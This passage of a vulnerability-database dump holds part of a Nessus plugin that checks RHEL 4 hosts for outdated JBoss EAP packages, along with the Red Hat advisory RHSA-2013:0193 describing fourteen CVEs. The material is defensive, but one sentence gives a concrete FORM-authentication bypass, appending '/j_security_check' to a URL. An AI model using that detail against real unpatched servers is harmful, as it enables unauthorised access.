reference:\"jboss-javaee-poms-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jca-1.5-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jms-1.1-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jpa-deployers-1.0.0-6.SP2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-naming-5.0.3-5.CP02.ep5.el4\")) 
flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-reflect-2.0.4-2.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-remoting-2.5.4-10.SP4.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-docs-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-examples-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-runtime-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-security-negotiation-2.1.3-1.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-security-spi-2.0.5-4.SP3_1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-vfs2-2.2.1-2.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-web-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-web-client-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-web-tp-licenses-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-web-ws-native-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-ws-cxf-ewp-5.2.0-8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbosssx2-2.0.5-8.3.SP3_1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossts-4.6.1-12.CP13.8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossts-javadoc-4.6.1-12.CP13.8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", 
reference:\"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-lib-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-3.1.2-13.SP15_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-common-1.1.0-9.SP10.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-framework-3.1.2-9.SP13.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-spi-1.1.2-6.SP8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jgroups-2.6.22-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-embedded-1.3.4-19.SP6.9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-jboss-as-5-plugin-3.0.0-15.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-federation-2.1.5-3.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", 
reference:\"picketlink-quickstarts-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-idp-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-pdp-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-sts-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-examples-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-javadoc-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-manual-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rh-ewp-docs-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rh-ewp-docs-examples-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-common-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-client-api-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-comm-api-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-domain-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-gui-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-native-system-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-plugin-api-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-plugin-container-3.0.0-22.EmbJopr5.ep5.el4\")) 
flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-util-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-jboss-as-common-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-modules-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-platform-plugin-3.0.0-15.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-plugins-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-agent-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-all-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-aop-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-beans-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-context-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-core-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"wss4j-1.5.12-4.2_patch_02.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xerces-j2-2.9.1-10.patch02.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xerces-j2-scripts-2.9.1-10.patch02.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el4\")) 
flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-security-1.5.1-2.ep5.el4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"aopalliance / apache-cxf / bsh2 / bsh2-bsf / glassfish-jaxb / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:56:09", "description": "Updated JBoss Enterprise Application Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Application Platform 5.2.0 release serves as a replacement for JBoss Enterprise Application Platform 5.1.2, and includes bug fixes and enhancements. 
Refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. 
(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. 
(CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2013-01-24T00:00:00", "type": "nessus", "title": "RHEL 4 : JBoss EAP (RHSA-2013:0193)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:aopalliance", "p-cpe:/a:redhat:enterprise_linux:apache-cxf", "p-cpe:/a:redhat:enterprise_linux:bsh2", "p-cpe:/a:redhat:enterprise_linux:bsh2-bsf", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb", "p-cpe:/a:redhat:enterprise_linux:google-guice", "p-cpe:/a:redhat:enterprise_linux:hibernate3", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc", "p-cpe:/a:redhat:enterprise_linux:hornetq", "p-cpe:/a:redhat:enterprise_linux:hornetq-native", "p-cpe:/a:redhat:enterprise_linux:jacorb-jboss", "p-cpe:/a:redhat:enterprise_linux:javassist", "p-cpe:/a:redhat:enterprise_linux:jboss-aop2", 
"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-core", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-cl", "p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api", "p-cpe:/a:redhat:enterprise_linux:jboss-common-beans", "p-cpe:/a:redhat:enterprise_linux:jboss-common-core", "p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms", "p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec", "p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers", "p-cpe:/a:redhat:enterprise_linux:jboss-logmanager", "p-cpe:/a:redhat:enterprise_linux:jboss-messaging", "p-cpe:/a:redhat:enterprise_linux:jboss-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-reflect", "p-cpe:/a:redhat:enterprise_linux:jboss-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2", 
"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-security-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-vfs2", "p-cpe:/a:redhat:enterprise_linux:jbossas", "p-cpe:/a:redhat:enterprise_linux:jbossas-client", "p-cpe:/a:redhat:enterprise_linux:jbossas-hornetq", "p-cpe:/a:redhat:enterprise_linux:jbossas-messaging", "p-cpe:/a:redhat:enterprise_linux:jbossas-tp-licenses", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native", "p-cpe:/a:redhat:enterprise_linux:jbosssx2", "p-cpe:/a:redhat:enterprise_linux:jbossts", "p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-lib", "p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:jbossws", "p-cpe:/a:redhat:enterprise_linux:jbossws-common", "p-cpe:/a:redhat:enterprise_linux:jbossws-framework", "p-cpe:/a:redhat:enterprise_linux:jbossws-spi", "p-cpe:/a:redhat:enterprise_linux:jgroups", "p-cpe:/a:redhat:enterprise_linux:jopr-embedded", "p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6", "p-cpe:/a:redhat:enterprise_linux:netty", 
"p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts", "p-cpe:/a:redhat:enterprise_linux:resteasy", "p-cpe:/a:redhat:enterprise_linux:resteasy-examples", "p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc", "p-cpe:/a:redhat:enterprise_linux:resteasy-manual", "p-cpe:/a:redhat:enterprise_linux:rh-eap-docs", "p-cpe:/a:redhat:enterprise_linux:rh-eap-docs-examples", "p-cpe:/a:redhat:enterprise_linux:rhq", "p-cpe:/a:redhat:enterprise_linux:rhq-common-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-domain", "p-cpe:/a:redhat:enterprise_linux:rhq-core-gui", "p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system", "p-cpe:/a:redhat:enterprise_linux:rhq-core-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container", "p-cpe:/a:redhat:enterprise_linux:rhq-core-util", "p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common", "p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent", "p-cpe:/a:redhat:enterprise_linux:spring2", "p-cpe:/a:redhat:enterprise_linux:spring2-agent", "p-cpe:/a:redhat:enterprise_linux:spring2-all", "p-cpe:/a:redhat:enterprise_linux:spring2-aop", "p-cpe:/a:redhat:enterprise_linux:spring2-beans", "p-cpe:/a:redhat:enterprise_linux:spring2-context", "p-cpe:/a:redhat:enterprise_linux:spring2-core", "p-cpe:/a:redhat:enterprise_linux:wss4j", "p-cpe:/a:redhat:enterprise_linux:xerces-j2", "p-cpe:/a:redhat:enterprise_linux:xml-commons", 
"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which11", "p-cpe:/a:redhat:enterprise_linux:xml-security", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2013-0193.NASL", "href": "https://www.tenable.com/plugins/nessus/64080", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0193. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64080);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5066\", \"CVE-2011-1096\", \"CVE-2011-2487\", \"CVE-2011-2730\", \"CVE-2011-2908\", \"CVE-2011-4575\", \"CVE-2012-0034\", \"CVE-2012-0874\", \"CVE-2012-2377\", \"CVE-2012-2379\", \"CVE-2012-3369\", \"CVE-2012-3370\", \"CVE-2012-3546\", \"CVE-2012-5478\");\n script_xref(name:\"RHSA\", value:\"2013:0193\");\n\n script_name(english:\"RHEL 4 : JBoss EAP (RHSA-2013:0193)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated JBoss Enterprise Application Platform 5.2.0 packages that fix\nmultiple security issues, various bugs, and add several enhancements\nare now available for Red Hat Enterprise 
Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Application Platform 5.2.0 release serves as a\nreplacement for JBoss Enterprise Application Platform 5.1.2, and\nincludes bug fixes and enhancements. Refer to the JBoss Enterprise\nApplication Platform 5.2.0 Release Notes for information on the most\nsignificant of these changes. The Release Notes will be available\nshortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain\ntext of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing\nsymmetric keys (for XML encryption), allowing a remote attacker to\nrecover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary\ncode in the context of the application server, or to obtain sensitive\ninformation from the server. Manual action is required to apply this\nfix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by\na Supporting Token, but not whether the correct token was used. A\nremote attacker could transmit confidential information without the\nappropriate security, and potentially circumvent access controls on\nweb services exposed via Apache CXF. Refer to the Solution section for\ndetails. 
(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another\ncomponent that calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve),\nit was possible to bypass the security constraint checks in the FORM\nauthenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote\nattacker to hijack the authenticated JMX Console session of an\nadministrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential\nif no security context was provided. Depending on the deployed\napplications, this could possibly allow a remote attacker to hijack\nthe credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing\nlocal users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain\ntext when an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the\nlog file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct\nexploitation of this flaw. 
